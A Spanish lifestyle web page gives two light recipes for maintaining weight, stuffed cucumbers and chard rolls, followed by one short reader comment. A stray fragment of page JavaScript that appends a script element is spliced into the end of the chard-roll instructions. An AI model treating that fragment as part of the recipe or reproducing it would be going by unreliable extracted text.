Salud y belleza » Alimentación, Dieta

Cocina sana para mantener la línea

1 Comentario

Mantener la línea es, incluso, más complicado que acceder al peso ideal. Es decir, muchos buscan, y encuentran, recetas para poder bajar de peso pero, en cambio, son pocos quienes se preocupan por alcanzar alguna estrategia para, sin seguir a dieta, aún así, continuar con el plan de control.

A saber: los alimentos que se necesitan para bajar de peso pueden ser similares pero jamás iguales a la cocina que se eleva como útil para mantener ese peso conseguido.

Suena útil entonces, el repaso de recetas que proponemos a continuación: cocina para mantener la línea. Del equilibrio entre exceso y defecto, nace la virtud: también en lo que a nutrición se refiere.

Pepinos rellenos

Ingredientes: un pepino, cien gramos de pollo cocido al horno, tomates pelados, cien gramos de panceta sin grasa, dos cucharadas de aceite de arroz, sal y pimienta negra a gusto, mayonesa light.

Elaboración: lavar el pepino, cortarlo en tiras no muy finas en forma longitudinal junto con los tomates (estos en cubos). Luego, en un bowl, colocar los cubos de pollo, los tomates cortados y las tiritas de panceta previamente horneadas para, más tarde, mezclar y aliñar con aceite, la mayonesa light, la sal y la pimienta. Finalmente, formar un aro y rellenar con la mezcla.

Rollitos de acelga

Ingredientes: veinte hojas de acelga, cinco cucharadas de queso de postre light, cebollas pequeñas ralladas, dientes de ajo, cebolla pequeña, once cucharadas de arroz integral cocido y colado, dos huevos, dos zanahorias ralladas, tres tomates pequeños, orégano, sal y pimienta.

Elaboración: ante todo, quitar la nervadura de las hojas de acelga y sumergirlas en  agua caliente hasta que pierdan rigidez para así manejarlas mejor. Luego, juntar el arroz, queso, huevos, cebollas, zanahorias, sal y pimienta: es necesario que se vaya formando una especie de rollo de primavera. Después, triturar el ajo con los tomates y la cebolla (ya condimentados). Mantener a fuego en una cacerola con agua y tapada y colocar los rollitos. Por último, cocinar  tapado, todo, a fuego lento, diez minutos.d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , ,

One Comment »

  • fernanda reyes said:

    una receta

    catsu motasa chiles salchacha juevo y tamarindo muy rico

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.